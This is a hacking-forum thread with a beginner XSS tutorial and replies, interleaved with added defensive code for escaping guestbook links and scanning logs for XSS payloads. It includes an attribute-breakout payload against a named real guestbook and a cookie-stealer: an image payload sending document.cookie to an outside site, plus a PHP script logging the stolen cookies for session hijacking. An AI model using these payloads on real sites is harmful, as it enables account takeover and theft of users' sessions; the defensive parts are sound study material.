Basic XSS (Cross Site Scripting)

Docs that have proven to be a staple in understanding computer/network security. This is not an inclusive forum and nothing published will tell you how to 0wn someone; these docs will help you understand how you got 0wnd.
fromint
n00b
Posts: 20
Joined: Sun Jun 03, 2007 3:09 pm
Location: Arizona

Basic XSS (Cross Site Scripting)

Post by fromint » Sun Jun 03, 2007 6:07 pm

Basic XSS, by fromint.
Helpful knowledge: HTML, JavaScript


1. What is XSS?

XSS (Cross Site Scripting), in layman's terms, is basically sending code snippets through URLs, guest books, forums, message boards, and other means of web interaction. XSS has become perhaps one of the biggest problems for a lot of major web sites.

2. Why?

One of the main reasons to use XSS is to force people to your site. With a simple JavaScript command, inserted correctly, I can (not here of course, but on exploitable forums) send a user directly to http://www.google.com.

Code:

<script language="javascript">
// send the viewer's browser to Google
location.href="http://www.google.com"
</script>

Usually, when people do this, they redirect people to their cookie stealer, so they can perhaps gain access to their account or find out other personal information. Most little script kiddies, though, will make some annoying alert boxes or pop up porn websites.

3. How?

XSS is most commonly used in guestbooks. The most vulnerable guestbooks, the ones that contain no filtering, usually don't have any sensitive information that you need a user's cookie for. These unprotected guestbooks are simply practiced on. For example, if I inserted this raw section of JavaScript into an unfiltered guestbook, I would receive a popup box saying "XSS".

Code:

<script language="javascript">
// pops up a box reading "XSS" when the guestbook page renders the entry
alert('XSS');
</script>

For more commercial guestbooks and forums, like Xanga and Myspace, this code would have to be drastically manipulated to be executed.

4. Real Example

I found an XSS exploit in a quite popular guestbook, the HTML Gear guestbook by Lycos. This guestbook is pretty tightly filtered in the comment section, so I tried elsewhere. In the picture below you see a text box that is marked "Homepage URL". Apparently, whatever you type in here is placed into the HTML code for a link: <a href="What you entered in textbox">What you entered in textbox</a>. Now, if I put a single quote ( " ) in my entry, the link would contain whatever I entered before it in the text box, because the single quote would end the value for the <a href> tag. That means whatever I put after the single quote could be used as a JavaScript command in the <a href> tag. For this tutorial, I will use the "OnMouseOver" JavaScript event handler. But, in reality, it's really up to you which event handler you decide to use. After the OnMouseOver event handler, I'm going to have a simple alert box pop up saying "XSS". For this I would use alert('XSS'). So, for my entire entry, I would put:

Code:

http://www.google.com" OnMouseOver="alert('XSS')

When that code is put into my guestbook entry, it fits nicely into the <a href> tag, as shown in the picture below. Go ahead, try it. Every time you roll over the link it pops up an XSS alert box. NOTE: IN THE PICTURES, I DID NOT SUBMIT THE ENTRY, BECAUSE THESE CAN GET YOU IN TROUBLE. LYCOS MOST LIKELY LOGS IPs. Feel free to experiment on your own, but remember that I am not recommending doing anything stupid, annoying (refer to script kiddies), or malicious. Have fun.

[Four screenshots referenced above are not preserved.]

~ fromint (Exploit works as of 6-03-07)
LmAo! My gamer just pwned ur honor student!
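The breakout in section 4 happens because the "Homepage URL" value is concatenated straight into an href attribute. The following is an added example, not code from the post or from HTML Gear: renderLinkUnsafe mirrors that concatenation, renderLinkSafe is the hardened form (scheme allow-list plus attribute encoding), and the same encoder is the fix for the comment field in section 3. All function names are assumptions for this example.

```javascript
// Added example, not code from the original post: how a guestbook's
// "Homepage URL" field can be rendered without the attribute breakout
// described above. renderLinkUnsafe mirrors the concatenation the post
// describes; renderLinkSafe is the hardened version.

// Encode the characters that terminate HTML text or a quoted attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the raw value is dropped into the attribute, so a " in the
// input closes the href value and the remainder becomes new attributes.
function renderLinkUnsafe(url) {
  return '<a href="' + url + '">' + url + '</a>';
}

// Allow only http(s) URLs as link targets; javascript:, data:, etc. are
// rejected, and anything the URL parser cannot parse is rejected too.
function isHttpUrl(url) {
  try {
    const p = new URL(url).protocol;
    return p === 'http:' || p === 'https:';
  } catch {
    return false;
  }
}

// Hardened: scheme allow-list, then attribute-encode both href and text.
// Rejected inputs are still displayed, but as inert text, not as a link.
function renderLinkSafe(url) {
  if (!isHttpUrl(url)) return escapeHtml(url);
  return '<a href="' + escapeHtml(url) + '">' + escapeHtml(url) + '</a>';
}

// The same encoder is the fix for the comment field in section 3.
function renderComment(text) {
  return '<p>' + escapeHtml(text) + '</p>';
}

// Number of raw double quotes in the output: a safe <a> tag has exactly 2,
// so any extra quote means the input escaped the attribute.
function rawQuoteCount(html) {
  return (html.match(/"/g) || []).length;
}
```

Note that the allow-list alone is not enough: a payload placed after a slash (`http://www.google.com/" OnMouseOver=...`) parses as a valid http URL, and only the attribute encoding keeps it inside the quotes.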

lonestar3457
Corporal
Posts: 125
Joined: Fri Dec 29, 2006 9:01 pm
Location: CMOS Batt,NY

Post by lonestar3457 » Sun Jun 03, 2007 6:38 pm

Nice tut.. You're new here, aren't you... Good job. Keep it up. I've always wanted to learn alternative methods to web based scripting, because HT is just getting really boring.
Just my two sense.

lonestar3457
Corporal
Posts: 125
Joined: Fri Dec 29, 2006 9:01 pm
Location: CMOS Batt,NY

Post by lonestar3457 » Sun Jun 03, 2007 6:42 pm

I got a question for you.. say if you were to make a site, such as a JavaScripted site or an HTML or XSS or whatever with input boxes, how would you get the information that the person has inputted into those fields into your possession? You would need some sort of server, right? That's where I'm stuck at. I'm kind of lost on how to set one up, providing that I only have one computer.
Just my two sense.

fromint
n00b
Posts: 20
Joined: Sun Jun 03, 2007 3:09 pm
Location: Arizona

Post by fromint » Sun Jun 03, 2007 7:31 pm

First of all, you need ANY kind of server to put your site on the web. XSS isn't a language, it's just an acronym for Cross Site Scripting, therefore you couldn't write a webpage with it. And no, you don't necessarily need a server with cgi/php/perl/etc (geocities). If I remember correctly, you can have a JavaScript file write it to a text file, even though it's not secure at all. If you have a server that supports PHP or another similarly functioning language (not geocities), you can do (in PHP for example) a simple $_GET["text field name here"] and have that be written to a database. So basically, if you don't care about security, go with a JavaScript file. If you want security, find a PHP supporting host (try googling "xlphp") and make the site there.
LmAo! My gamer just pwned ur honor student!

Fishbones
Tough Luck ;-)
Posts: 644
Joined: Thu May 24, 2007 2:27 pm
Location: Unknown

Post by Fishbones » Sun Jun 03, 2007 8:21 pm

Would it be possible to code a Cookie Stealer into a myspace message?
46 69 73 68 62 6f 6e 65 73

Patience is not a virtue, but a discipline.
-Fishbones

fromint
n00b
Posts: 20
Joined: Sun Jun 03, 2007 3:09 pm
Location: Arizona

Post by fromint » Sun Jun 03, 2007 8:34 pm

You wouldn't code the cookie stealer INTO the page; you send a bit of JavaScript, like this:

Code:

<img src=javascript:location.href="http://www.yoursite.com/index.php?cookie="+document.cookie></img>

This wouldn't work on Myspace, because it has really good filters. This would directly send the user to your page, which is a cookie stealer PHP script. The index.php might look something like this:

Code:

<?php
// read the value the redirect appended to the URL as ?cookie=...
$cookie = $_GET["cookie"];   // the post used $HTTP_GET_VARS, which later PHP versions removed
// append it to a text file on the server
$file = fopen('cookies.txt', 'a');
fwrite($file, $cookie . "\n\n");
fclose($file);
?>

If you look at the end of the JavaScript code (the very first code), you see that the cookie variable is defined as "document.cookie", which means whatever the particular viewing user's cookie is. Then look at the PHP code and see that it takes the "cookie" variable (document.cookie) and writes it to the text file called cookies.txt. That's pretty much it.
LmAo! My gamer just pwned ur honor student!
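Each payload shape shown in this thread (the attribute breakout from the first post, the <script> comment, the javascript: image source, and the ?cookie= exfiltration URL just above) leaves a recognisable trace in a web server's access log. The following is an added example, not code from the thread: it decodes the query string of each request and names the technique it matches. The log lines, paths, parameter names and the PHPSESSID value are all constructed for this example.

```javascript
// Added example, not from the original thread: flag guestbook/forum
// requests that carry the payload shapes shown in this thread.
// Log format, paths and parameter names are constructed.

// Constructed access-log lines in a simplified combined-log style.
const LOG_LINES = [
  '10.0.0.5 - - [03/Jun/2007:18:07:01] "GET /gb/sign?url=http%3A%2F%2Fwww.google.com HTTP/1.1" 200',
  '10.0.0.9 - - [03/Jun/2007:18:07:22] "GET /gb/sign?url=http%3A%2F%2Fwww.google.com%22%20OnMouseOver%3D%22alert(%27XSS%27) HTTP/1.1" 200',
  '10.0.0.7 - - [03/Jun/2007:18:08:10] "POST /gb/comment?text=%3Cscript%20language%3D%22javascript%22%3Ealert(%27XSS%27)%3C%2Fscript%3E HTTP/1.1" 200',
  '10.0.0.3 - - [03/Jun/2007:18:09:44] "GET /index.php?cookie=PHPSESSID%3Dabc123 HTTP/1.1" 200',
  '10.0.0.4 - - [03/Jun/2007:18:10:00] "GET /gb/view?page=2 HTTP/1.1" 200',
];

// Each rule names the technique it matches; regexes run on the decoded query.
const RULES = [
  { name: 'attribute-breakout', re: /["']\s*on\w+\s*=/i },   // "... OnMouseOver="
  { name: 'script-tag',         re: /<\s*script\b/i },       // <script language=...>
  { name: 'javascript-url',     re: /javascript\s*:/i },     // <img src=javascript:...>
  { name: 'cookie-exfil',       re: /document\.cookie|[?&]cookie=/i }, // index.php?cookie=
];

// Pull the request target out of a log line, then decode its query string.
// Decoding first matters: the payloads arrive percent-encoded.
function decodedQuery(line) {
  const m = line.match(/"(?:GET|POST)\s+(\S+)/);
  if (!m) return '';
  const qIndex = m[1].indexOf('?');
  if (qIndex === -1) return '';
  try {
    return decodeURIComponent(m[1].slice(qIndex).replace(/\+/g, ' '));
  } catch {
    return m[1].slice(qIndex);  // malformed encoding: inspect the raw query
  }
}

// Returns [{ line, rules: [...] }] for every line that trips at least one rule.
function flagSuspicious(lines) {
  const hits = [];
  for (const line of lines) {
    const q = decodedQuery(line);
    const rules = RULES.filter((r) => r.re.test(q)).map((r) => r.name);
    if (rules.length) hits.push({ line, rules });
  }
  return hits;
}
```

Run against the constructed lines, three of the five requests are flagged; the benign sign and view requests are not.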

PAPA SMURF
n00b
Posts: 16
Joined: Tue Aug 14, 2007 4:14 pm

Post by PAPA SMURF » Sun Dec 16, 2007 7:24 pm

So if you got someone redirected to your cookie stealer, it could steal someone's, say, eBay account or Myspace account passwords?
Three wrongs make a right

IceDane
Because I Can
Posts: 2652
Joined: Wed May 12, 2004 9:25 am

Post by IceDane » Sun Dec 16, 2007 7:30 pm

PAPA SMURF wrote: So if you got someone redirected to your cookie stealer, it could steal someone's, say, eBay account or Myspace account passwords?
Not entirely. However, some sites make use of cookies to know if you ticked the 'Stay logged in' box. If you retrieve the cookies, you can go to the site and you'll be logged in as the user in question. This is however only if you're lucky. Most use some sort of a security mechanism aside from cookies to make sure that the session isn't being hijacked.

(PS: Look up PHP session hijacking, too)

mardagz
n00b
Posts: 1
Joined: Fri Aug 07, 2009 8:26 pm

Re: Basic XSS (Cross Site Scripting)

Post by mardagz » Thu Sep 30, 2010 1:31 am


Thor
htd0rg lieutenant
Posts: 440
Joined: Tue Dec 18, 2007 9:39 am
Location: Location Location

Re: Basic XSS (Cross Site Scripting)

Post by Thor » Thu Sep 30, 2010 7:08 pm

GTFO with that bullshit...

narada
Hacker in Training
Posts: 92
Joined: Sat Apr 25, 2009 10:05 am

Re: Basic XSS (Cross Site Scripting)

Post by narada » Thu Sep 30, 2010 8:01 pm

lawl, this guy again.

Thor
htd0rg lieutenant
Posts: 440
Joined: Tue Dec 18, 2007 9:39 am
Location: Location Location

Re: Basic XSS (Cross Site Scripting)

Post by Thor » Fri Oct 01, 2010 9:10 pm

narada wrote:lawl, this guy again.
me?

narada
Hacker in Training
Posts: 92
Joined: Sat Apr 25, 2009 10:05 am

Re: Basic XSS (Cross Site Scripting)

Post by narada » Sun Oct 03, 2010 1:13 am

Thor wrote:
narada wrote:lawl, this guy again.
me?
Nah. mardagz was spamming this stuff in #hackerthreads too.

Thor
htd0rg lieutenant
Posts: 440
Joined: Tue Dec 18, 2007 9:39 am
Location: Location Location

Re: Basic XSS (Cross Site Scripting)

Post by Thor » Sat Oct 09, 2010 2:29 am

##Nuclear Missile Deployment Status: Cancelled##

oh, lol.

irramKege
n00b
Posts: 1
Joined: Tue Jul 05, 2011 8:21 am

Post by irramKege » Tue Jul 05, 2011 8:22 am

Could you tell me where I can learn more about it?
